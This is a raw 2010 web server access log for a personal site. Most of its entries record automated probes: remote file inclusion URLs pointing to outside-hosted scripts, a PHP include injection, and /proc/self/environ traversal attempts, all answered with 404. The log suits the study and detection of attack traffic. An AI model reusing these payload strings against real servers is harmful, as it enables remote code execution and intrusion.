205.209.170.26 - - [26/Apr/2010:10:29:33 -0500] "GET /logs/access_log.1225584000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:29:37 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:00 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:04 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:12 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:14 -0500] "GET /logs/access_log.1226016000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:16 -0500] "GET /logs/access_log.1226620800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:19 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:21 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:22 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "http://tomdolan.pconline.com/tattoo""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:24 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:26 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.26 - - [26/Apr/2010:10:30:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
79.174.78.178 - - [26/Apr/2010:10:32:41 -0500] "GET /xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:32:41 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:32:41 -0500] "GET /logs/xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:32:43 -0500] "GET /xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:32:43 -0500] "GET /logs/xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:32:44 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:32:52 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:32:52 -0500] "GET /xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:32:52 -0500] "GET /logs/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:32:54 -0500] "GET /logs/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:32:55 -0500] "GET /xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:32:55 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:32:58 -0500] "GET /logs/access_log.1270598400/xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
79.174.78.178 - - [26/Apr/2010:10:33:02 -0500] "GET /logs/access_log.1270598400/xGB.php?act=admin&do=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:33:04 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:33:08 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
205.209.170.26 - - [26/Apr/2010:10:34:12 -0500] "GET / HTTP/1.1" 200 1003 "http://www.pconline.com/~tomdolan""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
222.236.47.182 - - [26/Apr/2010:10:34:14 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:14 -0500] "GET /xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:14 -0500] "GET /logs/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:35 -0500] "GET /xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:35 -0500] "GET /logs/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:35 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:35 -0500] "GET /logs/access_log.1270598400/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [26/Apr/2010:10:34:58 -0500] "GET /logs/access_log.1270598400/xGB.php?act=admin&do=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.46.199.49 - - [26/Apr/2010:10:38:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.186 - - [26/Apr/2010:10:39:24 -0500] "GET /logs/access_log.1257120000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.28.5 - - [26/Apr/2010:10:47:48 -0500] "GET //include/new-visitor.inc.php?lvc_include_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.28.5 - - [26/Apr/2010:10:47:48 -0500] "GET /logs/access_log.1266710400//include/new-visitor.inc.php?lvc_include_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.122.28.5 - - [26/Apr/2010:10:47:48 -0500] "GET /logs//include/new-visitor.inc.php?lvc_include_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.122.28.5 - - [26/Apr/2010:10:47:48 -0500] "GET /logs/access_log.1263168000//include/new-visitor.inc.php?lvc_include_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:10:51:45 -0500] "GET /head.php?adresa=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:10:51:45 -0500] "GET /logs/access_log.1264636800/head.php?adresa=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:10:51:45 -0500] "GET /logs/head.php?adresa=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:10:52:00 -0500] "GET //errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:10:52:00 -0500] "GET /logs/access_log.1220054400//errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:10:52:00 -0500] "GET /logs//errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.46.13.94 - - [26/Apr/2010:10:54:54 -0500] "GET /logs/access_log.1199404800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.45 - - [26/Apr/2010:10:58:54 -0500] "GET /logs/access_log.1254960000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.187 - - [26/Apr/2010:11:00:25 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.147.246 - - [26/Apr/2010:11:03:47 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:03:47 -0500] "GET /logs/access_log.1264291200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:03:47 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:03:59 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:03:59 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:03:59 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
207.46.199.45 - - [26/Apr/2010:11:04:25 -0500] "GET /logs/access_log.1178150400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.126.28.140 - - [26/Apr/2010:11:04:33 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:05:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:05:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:05:20 -0500] "GET /logs/access_log.1264291200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:05:34 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:05:34 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:05:34 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:06:22 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:06:45 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:06:46 -0500] "GET /logs/access_log.1219363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:06:46 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:06:52 -0500] "GET /logs/access_log.1219363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:06:56 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:07:04 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:07:21 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:07:21 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:07:28 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:07:28 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:08:11 -0500] "GET /logs/access_log.1219363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
80.239.242.30 - - [26/Apr/2010:11:08:17 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
80.239.242.30 - - [26/Apr/2010:11:08:18 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
80.239.242.30 - - [26/Apr/2010:11:08:25 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
110.45.147.246 - - [26/Apr/2010:11:08:25 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
80.239.242.30 - - [26/Apr/2010:11:08:27 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
80.239.242.30 - - [26/Apr/2010:11:08:30 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
80.239.242.30 - - [26/Apr/2010:11:08:32 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
110.45.147.246 - - [26/Apr/2010:11:09:45 -0500] "GET /logs/access_log.1271030400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:10:38 -0500] "GET /logs/access_log.1271030400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:11:13:02 -0500] "GET /logs/access_log.1268870400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
68.233.9.242 - - [26/Apr/2010:11:14:29 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.833"
68.233.9.242 - - [26/Apr/2010:11:14:30 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.833"
68.233.9.242 - - [26/Apr/2010:11:14:30 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.833"
80.239.242.30 - - [26/Apr/2010:11:14:41 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00"
212.241.251.224 - - [26/Apr/2010:11:18:37 -0500] "GET /logs//index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.241.251.224 - - [26/Apr/2010:11:18:37 -0500] "GET //index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
110.45.147.246 - - [26/Apr/2010:11:20:20 -0500] "GET /logs/access_log.1265155200/mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:20:20 -0500] "GET /logs/mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:20:23 -0500] "GET /mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.195.112.180 - - [26/Apr/2010:11:21:25 -0500] "GET /logs/access_log.1223251200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.235 - - [26/Apr/2010:11:21:54 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.129.169.188 - - [26/Apr/2010:11:22:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
174.129.169.188 - - [26/Apr/2010:11:22:18 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
110.45.147.246 - - [26/Apr/2010:11:24:05 -0500] "GET /mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:24:05 -0500] "GET /logs/mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:24:05 -0500] "GET /logs/access_log.1265155200/mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:24:20 -0500] "GET /logs/access_log.1265155200/mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:24:20 -0500] "GET /mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
110.45.147.246 - - [26/Apr/2010:11:24:20 -0500] "GET /logs/mvcw.php?step=1&vwar_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.165.224 - - [26/Apr/2010:11:26:13 -0500] "GET /mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:26:14 -0500] "GET /logs/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:26:14 -0500] "GET /logs/access_log.1212969600/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""oi"
110.45.145.92 - - [26/Apr/2010:11:27:44 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:11:27:45 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:11:27:45 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:28:56 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:28:57 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:28:57 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:29:18 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:29:19 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:29:20 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
67.210.126.140 - - [26/Apr/2010:11:30:08 -0500] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""oi"
67.210.126.140 - - [26/Apr/2010:11:30:08 -0500] "GET /logs/main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""oi"
67.210.126.140 - - [26/Apr/2010:11:30:08 -0500] "GET /logs/access_log.1225238400/main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""oi"
67.210.126.140 - - [26/Apr/2010:11:30:08 -0500] "GET /logs/access_log.1223164800/main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""oi"
211.174.185.131 - - [26/Apr/2010:11:30:16 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:11:30:16 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:11:30:16 -0500] "GET /logs/access_log.1248652800//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:11:30:17 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
